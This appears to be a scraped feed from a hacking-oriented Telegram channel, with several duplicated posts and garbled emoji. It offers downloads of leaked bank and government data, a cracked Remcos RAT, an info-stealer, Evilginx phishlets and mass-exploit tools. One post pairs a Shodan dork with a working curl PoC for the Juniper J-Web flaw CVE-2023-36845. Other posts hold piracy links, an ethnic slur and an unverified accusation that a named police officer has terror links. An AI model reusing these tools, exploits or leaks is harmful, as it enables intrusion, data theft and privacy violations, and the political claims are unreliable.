Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Shell ๐
๐น Goshell
๐https://github.com/eze-kiel/goshell
๐นPrint-My-Shell
๐https://github.com/sameera-madushan/Print-My-Shell
๐นReverse-shell-generator
๐https://github.com/0dayCTF/reverse-shell-generator
๐นGirsh
๐https://github.com/nodauf/Girsh
๐น Blueshell
๐https://github.com/whitehatnote/BlueShell
๐นClink
๐http://mridgers.github.io/clink/
๐นNatpass
๐https://github.com/jkstack/natpass
๐นPlatypus
๐https://github.com/WangYihang/Platypus
๐นshells
๐https://github.com/4ndr34z/shells/
๐นReverse_ssh
๐https://github.com/NHAS/reverse_ssh
๐นHoaxshell
๐https://github.com/t3l3machus/hoaxshell
๐น Goshell
๐https://github.com/eze-kiel/goshell
๐นPrint-My-Shell
๐https://github.com/sameera-madushan/Print-My-Shell
๐นReverse-shell-generator
๐https://github.com/0dayCTF/reverse-shell-generator
๐นGirsh
๐https://github.com/nodauf/Girsh
๐น Blueshell
๐https://github.com/whitehatnote/BlueShell
๐นClink
๐http://mridgers.github.io/clink/
๐นNatpass
๐https://github.com/jkstack/natpass
๐นPlatypus
๐https://github.com/WangYihang/Platypus
๐นshells
๐https://github.com/4ndr34z/shells/
๐นReverse_ssh
๐https://github.com/NHAS/reverse_ssh
๐นHoaxshell
๐https://github.com/t3l3machus/hoaxshell
GitHub
GitHub - eze-kiel/goshell: Generate reverse shells in command line with Go !
Generate reverse shells in command line with Go ! Contribute to eze-kiel/goshell development by creating an account on GitHub.
CDI TEAM ON WHATSAP CHANNEL
IN THIS CHANNEL WE WILL PROVIDE YOU GUYS
๐๐ป CODING TUTORIALS AND HACKING TUTORIALS
๐๐ป WEBINARS
๐๐ป GIVEAWAYS AND TIPS AND TRICKS
๐๐ป HANDWRITTEN NOTES
AND MANY MORE STUFF...
LINK : https://whatsapp.com/channel/0029Va9JObd7j6gBzbQybW3r
DON'T FORGET TO SHARE IT WITH YOUR FRIENDS
โค๏ธ JAY SHREE RAAM โค๏ธ
IN THIS CHANNEL WE WILL PROVIDE YOU GUYS
๐๐ป CODING TUTORIALS AND HACKING TUTORIALS
๐๐ป WEBINARS
๐๐ป GIVEAWAYS AND TIPS AND TRICKS
๐๐ป HANDWRITTEN NOTES
AND MANY MORE STUFF...
LINK : https://whatsapp.com/channel/0029Va9JObd7j6gBzbQybW3r
DON'T FORGET TO SHARE IT WITH YOUR FRIENDS
โค๏ธ JAY SHREE RAAM โค๏ธ
๐1
This media is not supported in your browser
VIEW IN TELEGRAM
"Today Bharat has reached the Moon, the G20 meeting is being held in Bharat, and Pakistan is begging countries around the world for a billion dollars"
- Riyasat-e-Madina Pakistan's ex PM Nawaz Sharif.
- Riyasat-e-Madina Pakistan's ex PM Nawaz Sharif.
๐คฃ13๐ค1
๐งฎActMobile Networks Data Leak : Download
๐ฒInvicta Stealer: A Powerful, Native Stealer : Download
๐GoTTY โ Share Your Terminal As A Web Application : Explore
๐พJPGtoMalware : Try
๐Heart Sender V4.00.33 Crack : Download
@Crackcodes | Crackcodes.in | System32.ink
๐ฒInvicta Stealer: A Powerful, Native Stealer : Download
๐GoTTY โ Share Your Terminal As A Web Application : Explore
๐พJPGtoMalware : Try
๐Heart Sender V4.00.33 Crack : Download
@Crackcodes | Crackcodes.in | System32.ink
๐ฉNational Bank of Porkistan Data Leak : Download
๐ทNational Assembly of Porkistan Data Leak : Download
๐ฒOschad Bank of Ukraine Data Leak : Download
๐ธWAF Bypass Tool : Explore
๐Remcos Rat 3.8.0 Cracked (Clean) : Download
๐พCVE-2023-0255 Mass Exploit WordPress < Enable Media Plugin : Download
๐ชฌFortinet Ssl Vpn Bruteforce : Explore
@Crackcodes | System32.ink | Crackcodes.in
๐ทNational Assembly of Porkistan Data Leak : Download
๐ฒOschad Bank of Ukraine Data Leak : Download
๐ธWAF Bypass Tool : Explore
๐Remcos Rat 3.8.0 Cracked (Clean) : Download
๐พCVE-2023-0255 Mass Exploit WordPress < Enable Media Plugin : Download
๐ชฌFortinet Ssl Vpn Bruteforce : Explore
@Crackcodes | System32.ink | Crackcodes.in
๐พ3
Forwarded from ๐๐๐๐๐ก๐ฆ๐ ๐๐๐๐๐๐ฅ
The Pakistani government has advised all sectors to avoid using AI products and services of Indian origin.
The fintech sector, including some banks, in Pakistan has been collaborating with Indian-origin companies that offer IT products, cyber security, and AI solutions.
Two years ago, a US company called Exodus Intelligence claimed that India had used security vulnerabilities to spy on Pakistan and China.
Additionally, in 2020, Pakistani intelligence agencies discovered a significant security breach in which Indian hackers targeted the phones and devices of government officials and military personnel.
The fintech sector, including some banks, in Pakistan has been collaborating with Indian-origin companies that offer IT products, cyber security, and AI solutions.
Two years ago, a US company called Exodus Intelligence claimed that India had used security vulnerabilities to spy on Pakistan and China.
Additionally, in 2020, Pakistani intelligence agencies discovered a significant security breach in which Indian hackers targeted the phones and devices of government officials and military personnel.
๐7
๐ Exciting News! Introducing NeplixFile ๐
Tired of endless searches for files? NeplixFile is here to save the day! ๐
๐ NeplixFile - Your Ultimate File Search Engine ๐๐ฅ
Say goodbye to endless searching and hello to effortless access! NeplixFile is your go-to solution for finding files like courses, ebooks, movies, and more in a snap. ๐
โจ Key Features:
๐ Lightning-fast search capabilities
๐ Access to a treasure trove of resources
๐ Completely FREE!
Experience the power of NeplixFile today! ๐ Visit https://file.neplix.stream and simplify your file-finding journey. ๐
Tired of endless searches for files? NeplixFile is here to save the day! ๐
๐ NeplixFile - Your Ultimate File Search Engine ๐๐ฅ
Say goodbye to endless searching and hello to effortless access! NeplixFile is your go-to solution for finding files like courses, ebooks, movies, and more in a snap. ๐
โจ Key Features:
๐ Lightning-fast search capabilities
๐ Access to a treasure trove of resources
๐ Completely FREE!
Experience the power of NeplixFile today! ๐ Visit https://file.neplix.stream and simplify your file-finding journey. ๐
Juniper J-Web - Remote Code Execution ๐ฅ - CVE-2023-36845
Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:
Dork : title:"Juniper" http.favicon.hash:2141724739
Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:
https://lnkd.in/gEQrmXev
For more information:
https://lnkd.in/gRP3uXTm
#hacker_bano_chutiya_nhe
Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:
Dork : title:"Juniper" http.favicon.hash:2141724739
Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:
https://lnkd.in/gEQrmXev
For more information:
https://lnkd.in/gRP3uXTm
#hacker_bano_chutiya_nhe
โก4
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
List of Cryptography Tools used in CTFs :
Decoder 1: www.dcode.fr/
symbols-ciphers
Decoder 2: cryptii.com
Dedcoder 3: gchq.github.io/CyberChef
Decoder 4: crackstation.net
Rot Decoder: theblob.org/rot.cgi
Twin Hex: www.calcresult.com/misc/cyphers/twin-hex.html
Decoder 1: www.dcode.fr/
symbols-ciphers
Decoder 2: cryptii.com
Dedcoder 3: gchq.github.io/CyberChef
Decoder 4: crackstation.net
Rot Decoder: theblob.org/rot.cgi
Twin Hex: www.calcresult.com/misc/cyphers/twin-hex.html
๐ฅ2
CrackCodes ๐ฎ๐ณ pinned ยซ๐ฉNational Bank of Porkistan Data Leak : Download ๐ทNational Assembly of Porkistan Data Leak : Download ๐ฒOschad Bank of Ukraine Data Leak : Download ๐ธWAF Bypass Tool : Explore ๐Remcos Rat 3.8.0 Cracked (Clean) : Download ๐พCVE-2023-0255 Mass Exploit WordPressโฆยป
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Media is too big
VIEW IN TELEGRAM
๐ฆ๐ฟGoogle Dorks For Penetration Testing๐ฆ๐ฟ
๐บHow is Google dorking used by hackers?
:-Hacker utilize Google Dorks to uncover exposed data for example log files with usernames and passwords or cameras, etc.
๐บHow is Google dorking used by hackers?
:-Hacker utilize Google Dorks to uncover exposed data for example log files with usernames and passwords or cameras, etc.
โค3
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
โ
Watch Free Netflix Trick Working || 2023 Smoothly โ
โค๏ธ View -: https://netflixmirror.com
Its Paid But Now Free!!
Give Some Reaction ๐ฏ
โค๏ธ View -: https://netflixmirror.com
Its Paid But Now Free!!
Give Some Reaction ๐ฏ
๐3๐1๐1
After Kashmir, mole found in Kerala
A police officer in Kerala has connections to terrorists; SI Rijumon, a cyber cell officer, leaked highly confidential information to terrorists linked to ISIS!
ISIS terrorists are becoming more active in Kerala. It has been reported that SI Rijumon from the cyber cell has been suspended for links to terrorism in Kottayam.
The suspension occurred after the NIA discovered that he had shared confidential information with terrorist organizations. The terrorists who were recently arrested in Chennai were found to have ties to Rijumon. As a result, the NIA instructed the Kerala Police to suspend him promptly.
This is not the first time that infiltration of the PFI in the Kerala police force has come to the fore. Many years ago, intelligence reports suggested radicalization and pointed to a WhatsApp group of police officers called the Pacha Velicham (Green Light). It is suspected that sections of the Communist regime also use this group to carry out the party agenda
A police officer in Kerala has connections to terrorists; SI Rijumon, a cyber cell officer, leaked highly confidential information to terrorists linked to ISIS!
ISIS terrorists are becoming more active in Kerala. It has been reported that SI Rijumon from the cyber cell has been suspended for links to terrorism in Kottayam.
The suspension occurred after the NIA discovered that he had shared confidential information with terrorist organizations. The terrorists who were recently arrested in Chennai were found to have ties to Rijumon. As a result, the NIA instructed the Kerala Police to suspend him promptly.
This is not the first time that infiltration of the PFI in the Kerala police force has come to the fore. Many years ago, intelligence reports suggested radicalization and pointed to a WhatsApp group of police officers called the Pacha Velicham (Green Light). It is suspected that sections of the Communist regime also use this group to carry out the party agenda
โค1๐1๐1
โก
Made In India Internet browser "Veera" launched.
Arjun Ghose, Founder of Veera, said "Our mission was to craft a faster, safer and private browsing sanctuary for Indian internet users."
๐ธFew features :
1โฃAd-Free Browsing: No annoying third-party ads.
2๏ธโฃ Enhanced Security: Blocks trackers for a safer online experience.
3๏ธโฃ Localized Content: Enjoy tailored content that matters to you.
4๏ธโฃ Introducing Kavach: Your privacy shield against online trackers.
Made In India Internet browser "Veera" launched.
Arjun Ghose, Founder of Veera, said "Our mission was to craft a faster, safer and private browsing sanctuary for Indian internet users."
๐ธFew features :
1โฃAd-Free Browsing: No annoying third-party ads.
2๏ธโฃ Enhanced Security: Blocks trackers for a safer online experience.
3๏ธโฃ Localized Content: Enjoy tailored content that matters to you.
4๏ธโฃ Introducing Kavach: Your privacy shield against online trackers.
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Cheap And Free Hosting Sites
FlokiNET - http://flokinet.is | https://billing.flokinet.is
GearHost - https://www.gearhost.com
DarkHost - https://darkhost.pro
iFastNet - https://ifastnet.com
VPN NET - https://www.vpsnet.com/en
VernalWeb - https://www.vernalweb.com | https://clients.vernalweb.com
000WebHost - http://www.000webhost.com
DreamHost - https://www.dreamhost.com | https://mbsy.co
HostWinds - https://www.hostwinds.com
HostSailor - https://hostsailor.com | https://clients.hostsailor.com
KnownSRV - https://knownsrv.com
EuServr - https://euservr.com | https://euservr.com
Host22 - https://bit.ly/host_direct
Virtono - https://www.virtono.com
HostSpicy - https://hostspicy.com
RedSwitches - https://redswitches.com | https://dedicated.redswitches.com
WebCare360 - https://webcare360.com | https://my.webcare360.com
VPS9 - https://vps9.net
BanaHosting - https://banahosting.com | https://manage.banahosting.com
Webnode - http://webnode.com
HostPixel - https://hostpixel.biz
JetHost PRO - https://jethostpro.com
Katxe - https://client.katxe.cat
Realhost Argentina - https://clientes.realhost.com.ar
SydneyICT - https://www.sydneyict.net.au
OrangeWebsite - https://orangewebsite.com
CheapHostingBD - http://cheaphostingbd.com | https://bill.cheaphostingbd.com
Internoc24 - http://www.internoc24.host | https://my.internoc24.host
Contabo - http://contabo.com
Awardspace - https://www.awardspace.com
Atspace - https://www.atspace.com
HostSlick - https://hostslick.com
Free Hosting EU - https://www.freehostingeu.com
Geocities - http://www.geocities.ws
Miarroba - https://miarroba.com
Tekcities - http://tekcities.com
50Webs - https://www.50webs.com
FateBack - http://www.fateback.com
HostDZire - https://hostdzire.com
Njalla - https://njal.la
LeadHoster - https://leadhoster.com
AgilityHoster - https://agilityhoster.com
CurHost - https://curhost.com
Option123 - https://option123.net
FlokiNET - http://flokinet.is | https://billing.flokinet.is
GearHost - https://www.gearhost.com
DarkHost - https://darkhost.pro
iFastNet - https://ifastnet.com
VPN NET - https://www.vpsnet.com/en
VernalWeb - https://www.vernalweb.com | https://clients.vernalweb.com
000WebHost - http://www.000webhost.com
DreamHost - https://www.dreamhost.com | https://mbsy.co
HostWinds - https://www.hostwinds.com
HostSailor - https://hostsailor.com | https://clients.hostsailor.com
KnownSRV - https://knownsrv.com
EuServr - https://euservr.com | https://euservr.com
Host22 - https://bit.ly/host_direct
Virtono - https://www.virtono.com
HostSpicy - https://hostspicy.com
RedSwitches - https://redswitches.com | https://dedicated.redswitches.com
WebCare360 - https://webcare360.com | https://my.webcare360.com
VPS9 - https://vps9.net
BanaHosting - https://banahosting.com | https://manage.banahosting.com
Webnode - http://webnode.com
HostPixel - https://hostpixel.biz
JetHost PRO - https://jethostpro.com
Katxe - https://client.katxe.cat
Realhost Argentina - https://clientes.realhost.com.ar
SydneyICT - https://www.sydneyict.net.au
OrangeWebsite - https://orangewebsite.com
CheapHostingBD - http://cheaphostingbd.com | https://bill.cheaphostingbd.com
Internoc24 - http://www.internoc24.host | https://my.internoc24.host
Contabo - http://contabo.com
Awardspace - https://www.awardspace.com
Atspace - https://www.atspace.com
HostSlick - https://hostslick.com
Free Hosting EU - https://www.freehostingeu.com
Geocities - http://www.geocities.ws
Miarroba - https://miarroba.com
Tekcities - http://tekcities.com
50Webs - https://www.50webs.com
FateBack - http://www.fateback.com
HostDZire - https://hostdzire.com
Njalla - https://njal.la
LeadHoster - https://leadhoster.com
AgilityHoster - https://agilityhoster.com
CurHost - https://curhost.com
Option123 - https://option123.net
flokinet.is
FlokiNET: Secure the Net
Secure, Stable, Anonymous, Offshore Privacy focused Hosting Services
๐1
IF Anyone Found Any Indian Data Seller And Buyer Plz Ping Me In my Dm @mynk0x00
Example:
Username | Seller
Or
Username | Buyer
And Request To India Nationalist Don't Buy And Sell India Databases.
Thank You ๐งก
Example:
Username | Seller
Or
Username | Buyer
And Request To India Nationalist Don't Buy And Sell India Databases.
Thank You ๐งก
๐11โคโ๐ฅ1
๐ชฌChinaPost-Track Data Leak : Download
๐HTTP-Shell: MultiPlatform HTTP Reverse Shell : Download
๐ธDorXNG: Next Generation DorX : Download
๐ฒEvilginx3 Phishlets : Download
๐พCVE-2023-0099 Exploit : Simple Urls < 115 - Reflected XSS : Download
๐งฎWave Hill Data Leak : Download
๐Research Institute for Islamic Culture and Thought Data Leak : Download
๐HTTP-Shell: MultiPlatform HTTP Reverse Shell : Download
๐ธDorXNG: Next Generation DorX : Download
๐ฒEvilginx3 Phishlets : Download
๐พCVE-2023-0099 Exploit : Simple Urls < 115 - Reflected XSS : Download
๐งฎWave Hill Data Leak : Download
๐Research Institute for Islamic Culture and Thought Data Leak : Download
๐2
Another Part of SQL Injection๐ฅ
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐๐๐๐ต ๐๐๐ฝ๐ฎ๐๐
๐ง๐ผ๐ฝ๐ถ๐ฐ๐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. Authentication Basics
๐ฎ. Code Review of the Vulnerability๐จ
๐ฏ. Practically Bypassing Authentication with SQL Vulnerability.
๐ฃ๐น๐ฒ๐ฎ๐๐ฒ ๐๐ถ๐ธ๐ฒ & ๐ฆ๐๐ฏ๐๐ฐ๐ฟ๐ถ๐ฏ๐ฒ ๐๐ผ ๐ผ๐๐ฟ ๐ฌ๐ผ๐๐ง๐๐ฏ๐ฒ ๐ฐ๐ต๐ฎ๐ป๐ป๐ฒ๐น ๐ณ๐ผ๐ฟ ๐ ๐ผ๐ฟ๐ฒ ๐ฆ๐ค๐ ๐ถ๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ง๐ผ๐ฝ๐ถ๐ฐ. ๐๐ป๐
๐๐ถ๐ป๐ธ:
https://youtu.be/sEfpho_YlzI?si=hvhkvi1Iw-kuc9w4
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐๐๐๐ต ๐๐๐ฝ๐ฎ๐๐
๐ง๐ผ๐ฝ๐ถ๐ฐ๐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. Authentication Basics
๐ฎ. Code Review of the Vulnerability๐จ
๐ฏ. Practically Bypassing Authentication with SQL Vulnerability.
๐ฃ๐น๐ฒ๐ฎ๐๐ฒ ๐๐ถ๐ธ๐ฒ & ๐ฆ๐๐ฏ๐๐ฐ๐ฟ๐ถ๐ฏ๐ฒ ๐๐ผ ๐ผ๐๐ฟ ๐ฌ๐ผ๐๐ง๐๐ฏ๐ฒ ๐ฐ๐ต๐ฎ๐ป๐ป๐ฒ๐น ๐ณ๐ผ๐ฟ ๐ ๐ผ๐ฟ๐ฒ ๐ฆ๐ค๐ ๐ถ๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ง๐ผ๐ฝ๐ถ๐ฐ. ๐๐ป๐
๐๐ถ๐ป๐ธ:
https://youtu.be/sEfpho_YlzI?si=hvhkvi1Iw-kuc9w4
YouTube
26 SQL Injection Auth Bypass
๐๐น๐๐๐ค๐๐ง๐๐๐: https://drive.google.com/drive/folder...
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cyb
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.inโฆ
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cyb
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.inโฆ